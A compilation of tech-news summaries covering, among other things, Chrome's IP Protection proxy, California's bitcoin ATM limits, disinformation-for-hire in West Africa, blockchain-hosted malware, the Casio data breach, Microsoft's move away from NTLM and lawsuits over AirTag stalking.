Google is getting ready to test a new "IP Protection" feature for the Chrome browser that enhances users' privacy by masking their IP addresses using proxy servers. From a report: Recognizing the potential misuse of IP addresses for covert tracking, Google seeks to strike a balance between ensuring users' privacy and the essential functionalities of the web. IP addresses allow websites and online services to track activities across websites, thereby facilitating the creation of persistent user profiles. This poses significant privacy concerns as, unlike third-party cookies, users currently lack a direct way to evade such covert tracking.

While IP addresses are potential vectors for tracking, they are also indispensable for critical web functionalities like routing traffic, fraud prevention, and other vital network tasks. The "IP Protection" solution addresses this dual role by routing third-party traffic from specific domains through proxies, making users' IP addresses invisible to those domains. As the ecosystem evolves, so will IP Protection, adapting to continue safeguarding users from cross-site tracking and adding additional domains to the proxied traffic. "Chrome is reintroducing a proposal to protect users against cross-site tracking via IP addresses. This proposal is a privacy proxy that anonymizes IP addresses for qualifying traffic as described above," reads a description of the IP Protection feature. Initially, IP Protection will be an opt-in feature, ensuring users have control over their privacy and letting Google monitor behavior trends.

One 80-year-old retired teacher in Los Angeles lost $69,000 in bitcoin to scammers. And 46,000 people lost over $1 billion to crypto scams since 2021 (according to America's Federal Trade Commission).

Now the Los Angeles Times reports California's new moves against scammers using bitcoin ATMs, with a bill one representative says "is about ensuring that people who have been frauded in our communities don't continue to watch our state step aside when we know that these are real problems that are happening." Starting in January, California will limit cryptocurrency ATM transactions to $1,000 per day per person under Senate Bill 401, which Gov. Gavin Newsom signed into law. Some bitcoin ATM machines advertise limits as high as $50,000... Victims of bitcoin ATM scams say limiting the transactions will give people more time to figure out they're being tricked and prevent them from using large amounts of cash to buy cryptocurrency.

But crypto ATM operators say the new laws will harm their industry and the small businesses they pay to rent space for the machines. There are more than 3,200 bitcoin ATMs in California, according to Coin ATM Radar, a site that tracks the machines' locations. "This bill fails to adequately address how to crack down on fraud, and instead takes a punitive path focused on a specific technology that will shudder the industry and hurt consumers, while doing nothing to stop bad actors," said Charles Belle, executive director of the Blockchain Advocacy Coalition...

Law enforcement has cracked down on unlicensed crypto ATMs, but it can be tough for consumers to tell how serious the industry is about addressing the concerns. In 2020, a Yorba Linda man pleaded guilty to charges of operating unlicensed bitcoin ATMs and failing to maintain an anti-money-laundering program even though he knew criminals were using the funds. The illegal business, known as Herocoin, allowed people to buy and sell bitcoin in transactions of up to $25,000 and charged a fee of up to 25%.
So there's also provisions in the law against exorbitant fees: The new law also bars bitcoin ATM operators from collecting fees higher than $5 or 15% of the transaction, whichever is greater, starting in 2025. Legislative staff members visited a crypto kiosk in Sacramento and found markups as high as 33% on some digital assets when they compared the prices at which cryptocurrency is bought and sold. Typically, a crypto ATM charges fees between 12% and 25% over the value of the digital asset, according to a legislative analysis...

Another law would by July 2025 require digital financial asset businesses to obtain a license from the California Department of Financial Protection and Innovation.

The Washington Post tells the story of a veteran political operative and a former army intelligence officer hired to help keep in power the president of the west African nation Burkina Faso: Their company, Percepto International, was a pioneer in what's known as the disinformation-for-hire business. They were skilled in deceptive tricks of social media, reeling people into an online world comprised of fake journalists, news outlets and everyday citizens whose posts were intended to bolster support for [president Roch Marc] Kaboré's government and undercut its critics. But as Percepto began to survey the online landscape across Burkina Faso and the surrounding French-speaking Sahel region of Africa in 2021, they quickly saw that the local political adversaries and Islamic extremists they had been hired to combat were not Kaboré's biggest adversary. The real threat, they concluded, came from Russia, which was running what appeared to be a wide-ranging disinformation campaign aimed at destabilizing Burkina Faso and other democratically-elected governments on its borders.

Pro-Russian fake news sites populated YouTube and pro-Russian groups abounded on Facebook. Local influencers used WhatsApp and Telegram groups to organize pro-Russian demonstrations and praise Russian President Vladimir Putin. Facebook fan pages even hailed the Wagner Group, the Russian paramilitary network run by Yevgeniy Prigozhin, the late one-time Putin ally whose Internet Research Agency launched a disinformation campaign in the United States to influence the 2016 presidential election... Percepto didn't know the full scope of the operation it had uncovered but it warned Kaboré's government that it needed to move fast: Launch a counteroffensive online — or risk getting pushed out in a coup.

Three years later, the governments of five former French colonies, including Burkina Faso, have been toppled. The new leaders of two of those countries, Mali and Burkina Faso, are overtly pro-Russian; in a third, Niger, the prime minister installed after a July coup has met recently with the Russian ambassador. In Mali and the Central African Republic, French troops have been replaced with Wagner mercenaries...

Percepto's experience in French-speaking Africa offers a rare window into the round-the-clock information warfare that is shaping international politics — and the booming business of disinformation-for-hire. Meta, the social media company that operates Facebook, Instagram and WhatsApp, says that since 2017 it has detected more than 200 clandestine influence operations, many of them mercenary campaigns, in 68 countries.
The article also makes an interesting point. "The burden of battling disinformation has fallen entirely on Silicon Valley companies."

"A company backed by BlackRock has abandoned plans to build a 1,300-mile pipeline across the US Midwest to collect and store carbon emissions from the corn ethanol industry," reports Ars Technica.

The move comes "following opposition from landowners and some environmental campaigners." Navigator CO2 on Friday said developing its carbon capture and storage (CCS) project called Heartland Greenway had been "challenging" because of the unpredictable nature of regulatory and government processes in South Dakota and Iowa. Navigator's decision to scrap its flagship $3.1 billion project — one of the biggest of its kind in the US — is a blow for a fledgling industry... It also represents a setback for the carbon-intensive corn ethanol refining industry, a pillar of the rural Midwestern economy which is targeting industry-scale CCS as a way to reduce emissions...

The project faced opposition from local landowners, who expressed concerns about safety and property seizures, and some environmentalists who describe CO2 pipelines as dangerous and a way to prop up the fossil fuels industry, which already has a network of such infrastructure. Addressing the decision by Navigator, the Coalition To Stop CO2 Pipelines said it "celebrates this victory," but added: "we also know that the tax incentives made available by the federal government for carbon capture, transport and storage likely mean another entity will pick up Navigator's project, or find a different route through Illinois."
The article cites one analyst at energy research firm Wood Mackenzie who believes this cancellation could benefit rival carbon-capture companies like Summit Carbon Solutions, which is planning an even larger network of CO2 pipelines throughout the Midwest, and could try to sign deals with Navigator's former customers.

Breached web sites distribute malware to visitors by claiming they need to update their browser. But one group of attackers "have developed an ingenious way of keeping their malware from being taken down by security experts or law enforcement," reports security researcher Brian Krebs.

"By hosting the malicious files on a decentralized, anonymous cryptocurrency blockchain." [W]hen Cloudflare blocked those accounts the attackers began storing their malicious files as cryptocurrency transactions in the Binance Smart Chain (BSC), a technology designed to run decentralized apps and "smart contracts," or coded agreements that execute actions automatically when certain conditions are met. Nati Tal, head of security at Guardio Labs, the research unit at Tel Aviv-based security firm Guardio, said the malicious scripts stitched into hacked WordPress sites will create a new smart contract on the BSC Blockchain, starting with a unique, attacker-controlled blockchain address and a set of instructions that defines the contract's functions and structure. When that contract is queried by a compromised website, it will return an obfuscated and malicious payload.

"These contracts offer innovative ways to build applications and processes," Tal wrote along with his Guardio colleague Oleg Zaytsev. "Due to the publicly accessible and unchangeable nature of the blockchain, code can be hosted 'on-chain' without the ability for a takedown." Tal said hosting malicious files on the Binance Smart Chain is ideal for attackers because retrieving the malicious contract is a cost-free operation that was originally designed for the purpose of debugging contract execution issues without any real-world impact. "So you get a free, untracked, and robust way to get your data (the malicious payload) without leaving traces," Tal said.

In response to questions from KrebsOnSecurity, the BNB Smart Chain (BSC) said its team is aware of the malware abusing its blockchain, and is actively addressing the issue. The company said all addresses associated with the spread of the malware have been blacklisted, and that its technicians had developed a model to detect future smart contracts that use similar methods to host malicious scripts. "This model is designed to proactively identify and mitigate potential threats before they can cause harm," BNB Smart Chain wrote. "The team is committed to ongoing monitoring of addresses that are involved in spreading malware scripts on the BSC. To enhance their efforts, the tech team is working on linking identified addresses that spread malicious scripts to centralized KYC [Know Your Customer] information, when possible."

"The major online platforms are breaking up with news," reports the New York Times: Campbell Brown, Facebook's top news executive, said this month that she was leaving the company. Twitter, now known as X, removed headlines from the platform days later. The head of Instagram's Threads app, an X competitor, reiterated that his social network would not amplify news. Even Google — the strongest partner to news organizations over the past 10 years — has become less dependable, making publishers more wary of their reliance on the search giant. The company has laid off news employees in two recent team reorganizations, and some publishers say traffic from Google has tapered off... Some executives of the largest tech companies, like Adam Mosseri at Instagram, have said in no uncertain terms that hosting news on their sites can often be more trouble than it is worth because it generates polarized debates...

Publishers seem resigned to the idea that traffic from the big tech companies will not return to what it once was. Even in the long-fractious relationship between publishers and tech platforms, the latest rift stands out — and the consequences for the news industry are stark. Many news companies have struggled to survive after the tech companies threw the industry's business model into upheaval more than a decade ago. One lifeline was the traffic — and, by extension, advertising — that came from sites like Facebook and Twitter. Now that traffic is disappearing. Top news sites got about 11.5% of their web traffic in the United States from social networks in September 2020, according to Similarweb, a data and analytics company. By September this year, it was down to 6.5%...

The sharp decline in referral traffic from social media platforms over the past two years has hit all news publishers, including The New York Times. The Wall Street Journal noticed a decline starting about 18 months ago, according to a recording of a September staff meeting obtained by the Times. "We are at the mercy of social algorithms and tech giants for much of our distribution," Emma Tucker, the Journal's editor-in-chief, told the newsroom in the meeting...

Google cut some members of its news partnership team in September, and this week it laid off as many as 45 workers from its Google News team, the Alphabet Workers Union said. (The Information, a tech news website, reported the Google News layoffs earlier.) "We've made some internal changes to streamline our organization," Jenn Crider, a Google spokesperson, said in a statement... Jaffer Zaidi [Google's vice president of global news partnerships], wrote in an internal memo reviewed by the Times that the team would be adopting more artificial intelligence. "We had to make some difficult decisions to better position our team for what lies ahead," he wrote...

Privately, a number of publishers have discussed what a post-Google traffic future may look like and how to better prepare if Google's AI products become more popular and further bury links to news publications.

Toyota and BMW are two of the latest automakers to announce they're adopting Tesla's North American Charging System (NACS) plug for their North American EVs, giving drivers access to Tesla's Supercharger network. Ars Technica reports: BMW's announcement applies to all its car brands, which means that in addition to EVs like the BMW i5 or i7, it's also swapping over to NACS for the upcoming Mini EVs as well as the Rolls-Royce Spectre. BMW will start adding native NACS ports to its EVs in 2025, and that same year its customers will gain access to the Tesla Supercharger network. BMW's release doesn't explicitly mention a CCS1-NACS adapter being made available, but it does say that BMW (and Mini and Rolls-Royce) EVs with CCS1 ports will be able to use Superchargers from early 2025.

Similarly, the Toyota news applies to its brand as well as Lexus. Toyota says that it will start incorporating NACS ports into "certain Toyota and Lexus BEVs starting in 2025." And customers with Toyota or Lexus EVs that have a CCS1 port will be offered an adapter allowing them to use NACS chargers, also in 2025. And -- you guessed it -- 2025 is when Toyota and Lexus EVs gain access to the Supercharger network. While virtually all the brands that sell EVs in the North American market have announced the switch, there are still a couple holdouts. Stellantis has yet to make the switch, "meaning Alfa Romeo, Chrysler, Dodge, Fiat, Jeep, Maserati, and Ram are all sticking with CCS1 for now," reports Ars.

"Volkswagen Group has also yet to take the plunge, which means that Audi and Porsche are also staying with CCS1 for now, as well as the soon-to-be-reborn Scout brand." That said, they're expected to announce a switch to the NACS plug any day now.

Jessica Lyons Hardcastle reports via The Register: Japanese electronics giant Casio said miscreants broke into its ClassPad server and stole a database with personal information belonging to customers in 149 countries. ClassPad is Casio's education web app, and in a Wednesday statement on its website, the firm said an intruder breached a ClassPad server and swiped hundreds of thousands of "items" belonging to individuals and organizations around the globe. As of October 18, the crooks accessed 91,921 items belonging to Japanese customers, including individuals and 1,108 educational institution customers, as well as 35,049 items belonging to customers from 148 other countries. If Casio finds additional customers were compromised, it promises to update this count.

The data included customers' names, email addresses, country of residence, purchasing info including order details, payment method and license code, and service usage info including log data and nicknames. Casio noted that it doesn't not retain customers' credit card information, so presumably people's banking info wasn't compromised in the hack. An employee discovered the incident on October 11 while attempting to work in the corporate dev environment and spotted the database failure. "At this time, it has been confirmed that some of the network security settings in the development environment were disabled due to an operational error of the system by the department in charge and insufficient operational management," the official notice said. "Casio believes these were the causes of the situation that allowed an external party to gain unauthorized access." The intruder didn't access the ClassPad.net app, according to Casio, so that is still available for use.

Amazon announced today that it plans to expand its Prime Air drone delivery program to Italy and United Kingdom, as well as one more yet-to-be-named U.S. city. "The new Prime Air locations will be announced in the coming months, with an anticipated launch date of late 2024," reports The Verge. From the report: Another step by Amazon today suggests it's ready to make drones a more serious part of its actual delivery network. The company said it plans to add Prime Air delivery to its existing fulfillment network -- specifically by adding delivery drones to some of its same-delivery sites. Prime Air drones currently only operate out of the two standalone sites in Texas and California, so expanding drones to other sites means a wider delivery range and closer integration with Amazon's delivery network.

Amazon also gave us a sneak peek of its new Prime Air delivery drone that it claims flies twice as far as its current model. Even more critically, the drones will be able to operate in light rain and what Amazon calls more "diverse weather." The company released photos of the MK30 drone today, which it said will replace its existing delivery drones by late 2024.

The MK30 is also smaller and quieter than the existing Prime Air model, Amazon claims. The new drone can deliver objects of up to five pounds, with a typical delivery time of "one hour or less." The new drone includes a "sense and avoid" feature that can help it avoid pets, people, and property. The new design will hopefully result in smoother flights. "Not only will this help boost the economy, offering consumers even more choice while helping keep the environment clean with zero emission technology, but it will also build our understanding how to best use the new technology safely and securely," said UK's Aviation Minister Baroness Vere in a statement in Amazon's announcement.

The Five Eyes countries' intelligence chiefs came together on Tuesday to accuse China of intellectual property theft and using artificial intelligence for hacking and spying against the nations, in a rare joint statement by the allies. From a report: The officials from the United States, Britain, Canada, Australia and New Zealand - known as the Five Eyes intelligence sharing network - made the comments following meetings with private companies in the U.S. innovation hub Silicon Valley. U.S. FBI Director Christopher Wray said the "unprecedented" joint call was meant to confront the "unprecedented threat" China poses to innovation across the world.

From quantum technology and robotics to biotechnology and artificial intelligence, China was stealing secrets in various sectors, the officials said. "China has long targeted businesses with a web of techniques all at once: cyber intrusions, human intelligence operations, seemingly innocuous corporate investments and transactions," Wray said. "Every strand of that web had become more brazen, and more dangerous." In response, Chinese government spokesman Liu Pengyu said the country was committed to intellectual property protection.

Christopher Grimes reports via the Financial Times: Some of Netflix's competitors are reversing a streaming war tactic by licensing their old TV shows and movies to the streamer -- boosting its programming offerings but also potentially squeezing its profit margins, analysts say. Netflix relied heavily on programming that it licensed from other companies when it launched its streaming service in 2007. But after Walt Disney, NBCUniversal, Paramount and the then Time Warner launched their own streaming services, they pulled many of their shows from Netflix to avoid feeding a company that had grown into an arch-competitor. With legacy media groups under pressure to produce streaming profits, however, licensing revenue is looking attractive again -- even if it comes from Netflix. This summer, Warner Bros Discovery's HBO network began licensing a handful of older shows to Netflix, including Insecure, Six Feet Under, Ballers and Band of Brothers.

Analysts at Morgan Stanley said the return of licensing deals was a "long-term positive" for Netflix and would "pad" its lead over competitors in streaming. But the bank added that the cost of licensing -- along with the Netflix's investments in gaming and other sectors -- could add pressure to its profit margins in 2024. The analysts raised their outlook for Netflix's overall cash spending next year by $500mn to $17.7bn. Netflix will report results on Wednesday, with investors expected to focus on whether it plans to increase subscription prices and signs of progress on its new advertising tier. The latest data on its password sharing crackdown will also be watched.

[T]he studios' experiments with licensing deals appear to have given some old shows new life. After NBCUniversal licensed its show Suits -- which aired from 2011-19 and starred Meghan Markle -- to Netflix in June, the show experienced a revival. The legal drama was in the top spot on the Nielsen Streaming top 10 for three months, an example of the "Netflix effect" on older shows. Bloys said licensing shows to Netflix had also boosted traffic for the programs on Warner Discovery's Max streaming platform, home to HBO programming including Ballers, a sports drama that ran from 2015-19. Ballers entered the Nielsen top 10 after it went to Netflix, and Insecure, a comedy starring Issa Rae that ran from 2016-21, had a similar boost.

Amir Golestan, the 40-year-old CEO of the Charleston, S.C. based technology company Micfo, has been sentenced to five years in prison for wire fraud. From a report: Golestan's sentencing comes nearly two years after he pleaded guilty to using an elaborate network of phony companies to secure more than 735,000 Internet Protocol (IP) addresses from the American Registry for Internet Numbers (ARIN), the nonprofit which oversees IP addresses assigned to entities in the U.S., Canada, and parts of the Caribbean.

In 2018, ARIN sued Golestan and Micfo, alleging they had obtained hundreds of thousands of IP addresses under false pretenses. ARIN and Micfo settled that dispute in arbitration, with Micfo returning most of the addresses that it hadn't already sold. ARIN's civil case caught the attention of federal prosecutors in South Carolina, who in May 2019 filed criminal wire fraud charges against Golestan, alleging he'd orchestrated a network of shell companies and fake identities to prevent ARIN from knowing the addresses were all going to the same buyer.

Jon Brodkin reports via Ars Technica: An advertising industry group urged Comcast to stop its "10G" ads or modify them to state that 10G is an "aspirational" technology rather than something the company actually provides on its cable network today. The National Advertising Division (NAD), part of the advertising industry's self-regulatory system run by BBB National Programs, ruled against Comcast after a challenge lodged by T-Mobile. In its decision announced Thursday, the NAD recommended that Comcast "discontinue its '10G' claims" or "modify its advertising to (a) make clear that it is implementing improvements that will enable it to achieve '10G' and that it is aspirational or (b) use '10G' in a manner that is not false or misleading, consistent with this decision."

Comcast plans to appeal the decision, so it won't make any changes to marketing immediately. If Comcast loses the appeal and agrees to change its practices, it would affect more than just a few ads because Comcast now calls its entire broadband network "10G." "In February 2023, Comcast rebranded its fixed Internet network as 'Xfinity 10G Network' to signify technological upgrades to its network that are continuing to be implemented," the NAD said. Comcast's website claims that the "Xfinity 10G Network is already here! You'll see continual increases in network speed and reliability. No action is required on your part to join the Xfinity 10G Network." It also claims that 10G is "complementary" to the 5G mobile network.

An anonymous reader shared this report from Neowin: The various versions of Windows have used Kerberos as its main authentication protocol for over 20 years. However, in certain circumstances, the OS has to use another method, NTLM (NT LAN Manager). Today, Microsoft announced that it is expanding the use of Kerberos, with the plan to eventually ditch the use of NTLM altogether.

In a blog post, Microsoft stated that NTLM continues to be used by some businesses and organizations for Windows authentication because it "doesn't require local network connection to a Domain Controller." It also is "the only protocol supported when using local accounts" and it "works when you don't know who the target server is." Microsoft states:

These benefits have led to some applications and services hardcoding the use of NTLM instead of trying to use other, more modern authentication protocols like Kerberos. Kerberos provides better security guarantees and is more extensible than NTLM, which is why it is now a preferred default protocol in Windows. The problem is that while businesses can turn off NTLM for authentication, those hardwired apps and services could experience issues. That's why Microsoft has added two new authentication features to Kerberos.
Microsoft's blog post calls it "the evolution of Windows authentication," arguing that "As Windows evolves to meet the needs of our ever-changing world, the way we protect users must also evolve to address modern security challenges..." So, "our team is building new features for Windows 11."

• Initial and Pass Through Authentication Using Kerberos, or IAKerb, "a public extension to the industry standard Kerberos protocol that allows a client without line-of-sight to a Domain Controller to authenticate through a server that does have line-of-sight."

• A local Key Distribution Center (KDC) for Kerberos, "built on top of the local machine's Security Account Manager so remote authentication of local user accounts can be done using Kerberos."

• "We are also fixing hard-coded instances of NTLM built into existing Windows components... shifting these components to use the Negotiate protocol so that Kerberos can be used instead of NTLM... NTLM will continue to be available as a fallback to maintain existing compatibility."

• "We are also introducing improved NTLM auditing and management functionality to give your organization more insight into your NTLM usage and better control for removing it."

"Reducing the use of NTLM will ultimately culminate in it being disabled in Windows 11. We are taking a data-driven approach and monitoring reductions in NTLM usage to determine when it will be safe to disable."

Ashley Belanger reports via Ars Technica: This month, more than three dozen victims allegedly terrorized by stalkers using Apple AirTags have joined a class-action lawsuit filed in a California court last December against Apple. They alleged in an amended complaint (PDF) that, partly due to Apple's negligence, AirTags have become "one of the most dangerous and frightening technologies employed by stalkers" because they can be easily, cheaply, and covertly used to determine "real-time location information to track victims." Since the lawsuit was initially filed in 2022, plaintiffs have alleged that there has been an "explosion of reporting" showing that AirTags are frequently being used for stalking, including a spike in international AirTags stalking cases and more than 150 police reports in the US as of April 2022. More recently, there were 19 AirTags stalking cases in one US metropolitan area -- Tulsa, Oklahoma -- alone, the complaint said.

This seeming escalation is concerning, plaintiffs say, because Apple allegedly has not done enough to mitigate harms, and AirTags stalking can lead to financial ruin, as victims bear significant costs like hiring mechanics to strip their cars to locate AirTags or repeatedly relocating their homes. AirTags stalking can also end in violence, including murder, plaintiffs alleged, and the problem is likely bigger than anyone knows, because stalking is historically underreported. [...] Many plaintiffs said they had no clue what AirTags were when they first discovered hidden AirTags were being used to monitor their moves. At the very least, plaintiffs want Apple to be responsible for raising awareness of how AirTags are used by stalkers -- not just to inform people who are at risk of stalking but also to ensure law enforcement is aware. Plaintiffs have alleged that Apple did not provide information to police that prevented them from accessing protective orders and pressing criminal charges. The complaint also suggested other remedies Apple could provide, like improving the consistency of AirTag alerts, which plaintiffs claimed only sometimes appeared on iPhones, so that users are always aware when an AirTag is nearby. "Apple continues to find itself in the position of reacting to the harms its product has unleashed, as opposed to prophylactically preventing those harms," the complaint said.

A technology specialist for the National Network to End Domestic Violence, Corbin Streett, is also quoted in the complaint, pointing out that Apple's threat model seemed to only consider risks of strangers using AirTags for unwanted stalking, not abusive partners. That's a problem since advocacy groups like the federally funded Stalking Prevention, Awareness, & Resource Center report (PDF) that the "vast majority of stalking victims are stalked by someone they know" and "intimate partner stalkers are the most likely stalkers to approach, threaten, and harm their victims." "I hope Apple keeps their learning hat on and works to figure out that piece of the puzzle," Streett said.

Jessica Lyons Hardcastle reports via The Register: The European Telecommunications Standards Institute (ETSI) may open source the proprietary encryption algorithms used to secure emergency radio communications after a public backlash over security flaws found this summer. "The ETSI Technical Committee in charge of TETRA algorithms is discussing whether to make them public," Claire Boyer, a spokesperson for the European standards body, told The Register. The committee will discuss the issue at its next meeting on October 26, she said, adding: "If the consensus is not reached, it will go to a vote."

TETRA is the Terrestrial Trunked Radio protocol, which is used in Europe, the UK, and other countries to secure radio communications used by government agencies, law enforcement, military and emergency services organizations. In July, a Netherlands security biz uncovered five vulnerabilities in TETRA, two deemed critical, that could allow criminals to decrypt communications, including in real-time, to inject messages, deanonymize users, or set the session key to zero for uplink interception. At the time ETSI downplayed the flaws, which it said had been fixed last October, and noted that "it's not aware of any active exploitation of operational networks."

At the time ETSI downplayed the flaws, which it said had been fixed last October, and noted that "it's not aware of any active exploitation of operational networks." It did, however, face criticism from the security community over its response to the vulnerabilities -- and the proprietary nature of the encryption algorithms, which makes it more difficult for proper pentesting of the emergency network system. "This whole idea of secret encryption algorithms is crazy, old-fashioned stuff," said security author Kim Zetter who first reported the story. "It's very 1960s and 1970s and quaint. If you're not publishing [intentionally] weak algorithms, I don't know why you would keep the algorithms secret."

Schools for children of military members achieve results rarely seen in public education. From a report: Amy Dilmar, a middle-school principal in Georgia, is well aware of the many crises threatening American education. The lost learning that piled up during the coronavirus pandemic. The gaping inequalities by race and family income that have only gotten worse. A widening achievement gap between the highest- and lowest-performing students. But she sees little of that at her school in Fort Moore, Ga. The students who solve algebra equations and hone essays at Faith Middle School attend one of the highest-performing school systems in the country. It is run not by a local school board or charter network, but by the Defense Department. With about 66,000 students -- more than the public school enrollment in Boston or Seattle -- the Pentagon's schools for children of military members and civilian employees quietly achieve results most educators can only dream of.

On the National Assessment of Educational Progress, a federal exam that is considered the gold standard for comparing states and large districts, the Defense Department's schools outscored every jurisdiction in math and reading last year and managed to avoid widespread pandemic losses. Their schools had the highest outcomes in the country for Black and Hispanic students, whose eighth-grade reading scores outpaced national averages for white students. Eighth graders whose parents only graduated from high school -- suggesting lower family incomes, on average -- performed as well in reading as students nationally whose parents were college graduates. The schools reopened relatively quickly during the pandemic, but last year's results were no fluke. While the achievement of U.S. students overall has stagnated over the last decade, the military's schools have made gains on the national test since 2013. And even as the country's lowest-performing students -- in the bottom 25th percentile -- have slipped further behind, the Defense Department's lowest-performing students have improved in fourth-grade math and eighth-grade reading.

SpaceX quietly published a new "Starlink Direct to Cell" webpage highlighting the company's forthcoming cell service for mobile phones. MobileSyrup reports: The new 'Starlink Direct to Cell' page boasts "seamless access to text, voice, and data for LTE phones across the globe" and notes that the company is targeting text capabilities in 2024, followed by voice and data capabilities in 2025. Internet of Things (IoT) support may also arrive in 2025. Starlink also advertises that the direct-to-cell system would work with "existing LTE phones wherever you can see the sky" and wouldn't require any changes to hardware, firmware, or special apps. The page also explains that Starlink Direct to Cell would use "an advanced eNodeB modem" that "acts like a cellphone tower in space." The system would allow network integration "similar to a standard roaming partner." Last year, SpaceX announced a partnership with T-Mobile, allowing users' mobile phones to connect directly with Starlink satellites in orbit. SpaceX said it was hoping to launch the service later this year but the company has been mum on the progress.

An anonymous reader quotes a report from Ars Technica: Facebook may have to overhaul its entire ad-targeting system after a California court ruled (PDF) last month that the platform's practice of routinely targeting ads by age, gender, and other protected categories violates a state anti-discrimination law. The decision came after a 48-year-old Facebook user, Samantha Liapes, fought for years to prove that Facebook had discriminated against her as an older woman using the platform's ad-targeting system to shop for life insurance policies.

Liapes filed a class-action lawsuit against Facebook in 2020. In her complaint, Liapes alleged that "Facebook requires all advertisers to choose the age and gender of its users who will receive ads, and companies offering insurance products routinely tell it to not send their ads to women or older people." Further, she alleged that Facebook's ad-delivery algorithm magnifies the problem by using these required inputs to serve the ads to "lookalike audiences." Through its algorithm, Liapes alleged that she found that Facebook "discriminates against women and older people," by intentionally excluding them from seeing certain life insurance ads. This, Liapes alleged, caused harm by preventing her from signing up for deals that "often change and may expire" -- deals which she said were disproportionately being advertised on Facebook to younger and/or male audiences. As evidence, Liapes pointed to ads that Facebook did not serve to her -- allegedly because advertisers used the platform's Audience Selection and Lookalike Audience tools to exclude her -- as an older woman [...]. "As a result, she had a harder time learning about those products or services," Liapes' complaint alleged. [...]

Initially, a court agreed with Facebook's arguments that Liapes had not provided sufficient evidence establishing Facebook's intent or demonstrating harms caused, but rather than amend her complaint, Liapes appealed. Then, in what tech law expert Eric Goldman on his blog called a "shocking conclusion," a California court last month reversed that initial decision, finding instead that Facebook's ad-targeting tools are not neutral, discriminate against users by age and gender, and are not immune under Section 230 of the Communications Decency Act. Goldman -- who joked that Liapes wanting more Facebook ads is "a desire shared by almost no one" -- said that the potential impact of this ruling goes beyond possibly shaking up Facebook's ad system. It also seemingly implicates every other ad network by finding that "any gender- or age-based ad targeting for any product or service (and targeting based on any other protected characteristics) could violate the Unruh Act." If the ruling is upheld, that could "have devastating effects on the entire Internet ecosystem," Goldman warned. "The court's single-minded determination to find a valid discrimination claim under these conditions casts a long and troubling shadow over the online advertising industry," Goldman wrote in his blog. "Who needs new privacy laws if the Unruh Act already bans most ad targeting?"

"The opinion never expressly says that the Unruh Act regulates ad targeting," Goldman told Ars. "It takes some reading between the lines to reach that conclusion."

A network connectivity error caused Mastodon to severely undercount its users. According to founder and CEO Eugen Rochko, the decentralized social network actually has 407,814 more monthly active users than it had been reporting previously. "The adjustment also included a gain of 2.34 million registered users across an additional 727 servers that had not been counted due to the error," reports TechCrunch. From the report: The issue was impacting the metrics reported on Mastodon's statistics aggregator on its joinmastodon.org/servers page, which had been undercounting users between October 2 and October 8. This issue has now been resolved, Rochko said. That leaves Mastodon with a total of 1.8 million monthly active users at present, an increase of 5% month-over-month and 10,000 servers, up 12% -- a testament to Mastodon's current upward swing at a time when the nature of X continues to remain in flux.